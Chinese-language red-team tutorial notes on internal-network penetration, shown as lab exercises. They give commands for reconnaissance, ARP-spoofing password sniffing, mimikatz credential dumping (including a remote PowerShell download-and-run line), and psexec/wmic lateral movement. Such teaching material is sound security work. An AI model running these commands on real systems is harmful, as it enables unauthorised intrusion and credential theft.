4.內網信息收集(補充)


0x01. 內網機器信息收集

1. 內網信息收集

內網是分布在一個區域性的網絡,也稱之為局域網,針對於內網不公開於互聯網之上,內網分為好幾種類型,有服務器內網、辦公區域內網等等,內網可以方便的傳輸,以及可以保證其數據的安全,其資產不亞於暴露外網的資產多,內網信息收集也是非常重要的。

作為紅隊來講,突破內網的前提下就是針對於內網的信息收集,內網的資產分布式很廣,不僅是WEB,甚至開放了各種危險端口,在內網中機器不保證其開防火牆,所以我們可以任由橫穿,假設內網機器大量沒有打補丁的ms17010漏洞,我們就可以橫穿其內網了。

再一方面,即使內網很安全,當我們收集到密碼之后去撞庫,測試一下密碼是否被重復使用,也可以實現攻破其他主機。

2. 內網信息收集隱蔽

在收集內網信息的前提下,我們需要針對管理員的登錄時間進行查看

net user administrator  // 查看最后登錄時間

wevtutil epl security C:\System_log.evtx        // 保存所有日志信息 , 需要管理員權限

舉例 : 使用物理機 , 遠程鏈接靶機 , 然后在靶機上執行導出日志 , 打開日志查看是否有遠程登錄信息

image-20210703153119149

看到了剛才遠程鏈接電腦的IP地址啦

0x02. 內網信息收集命令

1. 內網本機信息收集命令-1

ipconfig /all           查詢本機IP信息是否多網卡
net user                 查看本機有幾個賬戶
query user             查看在線的用戶
tasklist /v               顯示所有運行的進程
systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本"     查詢系統版本
systeminfo         查看補丁信息
net share           查看共享信息
netsh firewall show config        查看防火牆信息
net statistics workstation          查看開機時間

補充 :finsubnet(Mac).py 發現內網具有兩張網卡的主機

python27 finsubnet(Mac).py -i 192.168.1.1-192.168.1.254

2. 內網本機信息收集命令-2

wmic product get name,version        查看安裝軟件
net session                                         查看會話
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f                          開啟rdp
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber                                       查看rdp對應的端口
net config workstation                       查看是否存在域環境
netsh wlan show profiles                   查看鏈接過的wifi
netsh wlan show profiles name="WiFi名稱" key=clear命令     查看具體wifi密碼

3. RDP連接歷史記錄

針對某些服務器/個人PC場景,我們可以使用以下命令查看連接過的記錄。

注意:是查看當前主機都用遠程鏈接鏈接過那些主機

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

image-20210703155638197

4. 針對內網主機提權

使用命令 : systeminfo

將信息復制到即可自動尋找提權exp

http://bugs.hacking8.com/tiquan/

image-20210703155827373

5. 內網資產的脆弱性

漏洞危害(CVE)

敏感信息泄露

服務弱口令

歷史密碼

瀏覽器記錄

連接歷史記錄 (xshell等等)

0x03. 內網主機探測及掃描

1. 內網穿透–流量代理

流量代理出網是將目標機器的內網代理出自己的機子,之后再進行掃描,一般代理出網的代理大部分都socks5、socks4,流量代理的工具有很多,個人感覺最好的還是Frp比較穩定。

內網流量轉發

#frpc.ini
[common]
server_addr = 0.0.0.0
server_port = 7000
[socks_proxy]
type = tcp
remote_port = 6554
plugin = socks5

2. 內網區域大小探測

我們可以通過arp /a來觀察網段的總體情況

私有IP地址有10段、172段、192段,大小 : 從大到小排序的

A類地址

10.0.0.0--10.255.255.255

B類地址

172.16.0.0--172.31.255.255

C類地址

192.168.0.0--192.168.255.255

3. 內網主機存活檢測

存活檢測,可以使用批量Ping的方式或者使用其他工具軟件,也可以將流量代理出來進行掃描

使用NMAP或者其他方式進行檢測

當流量代理出來,我們可以使用 proxychains 去調用 nmap 進行對目標內網進行掃描

4. NTSCAN

NTSCAN是比較老的一款工具了,但是他的實用價值非常高,可以直接爆破內網內的主機

先設置賬號密碼字典

image-20210703161308892

image-20210703162120036

5. 內網弱口令檢測

在內網中必定充斥着大量的弱口令服務,所以我們可以對其弱口令進行探測

使用工具:超級弱口令檢查工具

image-20210703161600591

6. 脆弱性WEB資產掃描

我們可以使用WebAliveScan對其內網進行脆弱性WEB資產掃描,首先我們收集存活的內網IP之后對其掃描。

地址: https:/lgithub.com/cangqingzhe/WebAliveScan

安裝 pip3 install -r requirements.txt

使用 :

python3 webscan.py --target target.txt --port 80

python3 webscan.py --target target.txt --port large

7. 內網流量嗅探

這款工具可以嗅探到內網的流量,並且可以主動收集內網的密碼,不過操作可能比較復奪這里我實操來演示

image-20210703162509588

ARP欺騙 , 軟件使用教程

image-20210703163426653

image-20210703163447590

然后欺騙我們的靶機119那個

image-20210703164226008

然后靶機119 , 登錄一個網站 , 這個站點是明文傳輸的 ,而且提交的字段在我們的字段字典中

image-20210703164357001

返回攻擊機查看 , 得到賬號和密碼

image-20210703164202859

補充 :關於ARP欺騙之前的筆記有詳細

0x04. 內網主機密碼收集

1. mimikatz抓取本機密碼

mimikatz是一款簡單且好用的windows密碼抓取神器,該軟件可幫助用戶一鍵抓取window密碼,操作簡單、使用方便。

在域滲透過程中另外一名老師會為大家講解mimikatz的一些高級使用,這里只做簡單介紹

進入到mimikatz目錄(必須system權限)
mimikatz.exe     // 啟動工具  
privilege::debug  //提升權限
sekurlsa::logonpasswords  //抓取密碼

一條命令也可以
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

image-20210703165659195

 //powershell遠程加載方式
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.156/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz

2. lazagne抓取密碼

LaZagne是一款功能比較多的抓取密碼工具,可以抓取windows、wifi、瀏覽器、數據庫等密碼。

下載地址: https://github.com/AlessandroZ/LaZagne/releases/tag/2.4.3

3. xshell密碼抓取密碼

在內網滲透中可能會發現連接ssh的相關信息,一般都是xshell程序,我們可以使用該程序來對xshell的密碼進行破

解,安裝以及生成exe的過程如下:

https://github.com/dzxs/Xdecrypt

4. SharpDecryptPwd密碼抓取工具

SharpDecryptPwd是一款強大的密碼解密工具,支持五種方式,包括native、teamviewer,filezilla、WinSCP、Xmanager。

https://github.com/uknowsec/SharpDecryptPwd

5. mimikatz獲取rdp連接記錄密碼

注意:是獲取當前主機鏈接過那些主機的3389記錄

1.查找本地的Credentials (證書) , 靶機執行
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

image-20210704095828571

2.使用mimikatz進行操作 (管理員權限運行)
mimikatz "privilege::debug" "dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B" "sekurlsa::dpapi" exit

jack是當前靶機的登錄用戶(x)

image-20210704100531152

guidMasterkey是我們需要的

image-20210704100643323

根據我們記錄的guidMasterkey得到MasterKey(加密密鑰)

* MasterKey :  3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925

最后就差解密了,我這里面是 , 依然是在mimikatz中執行

dpapi::cred /in:C:\Users\jack\AppData\Local\Microsoft\Credentials\7AB721DA2E0FEE4E5461654D463F007B /masterkey:3474791e200b87da22518dda8f043fa2ea4fc7d162562c94cdf835a70b6c0fb4e09fb465f5ac4f92d054bffe8b253ea12d3a5fc26bcce6f23a78689018e4c925

image-20210704101120975

參考鏈接 : https://blog.csdn.net/q1352483315/article/details/100075078

0x05. 內網橫向滲透演示

1. IPC空連接概述

前提是已經獲得了目標機器的賬號和密碼

IPC(Internet Process Connection)是共享"命名管道"的資源。

它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。

IPC是NT/2000的一項新功能,它有一個特點,即在同一時間內,兩個IP之間只允許建立一個連接。NT/2000在提供了ipc功能的同時,在初次安裝系統時還打開了默認共享,即所有的邏輯共享(c,d,e....和系統自錄winnt或windows(admin)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。

2. 建立空連接命令

net share						查看本機共享
net use \\IP地址 "密碼" /user:用戶名	對其進行空連接
net use \\192.168.0.119\c$ "a" /user:"administrator"

net use \\IP地址 /del 			    刪除空連接
net time \\lP地址					查看機器時間

首先在攻擊機上用賬號和密碼進行空連接 , 然后文件管理中訪問靶機的C盤

image-20210703172707125

補充 : 如果不能訪問可能是權限問題

3. PSEXEC橫向工具

微軟提供的一種遠程命令行工具

可直接用於對遠程主機進行命令交互

psexec.exe \\lP -u domainladministrator -p password command
psexec.exe \\192.168.0.119 -u administrator -p a cmd.exe

image-20210703173316461

然后在靶機上查看

image-20210703173221820

4. wmic橫向

wmic是一款Windows自帶的工具集,可以通過/node選項直接對遠程過程調用RPD訪問,允許直接執行命令。

wmic /node:192.168.0.119 /user:administrator /password:a             # 連接后面拼接wmic命令
			靶機ip

常見的vmic命令
process call create "cmd.exe"                                           #啟動某一程序
process call create "msg jack a" 
process call create "cmd.exe /c echo > c:\1.txt” 
process list brief                                                                 #查看所有進程

image-20210703174209993

image-20210703174308347

image-20210703174253561


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM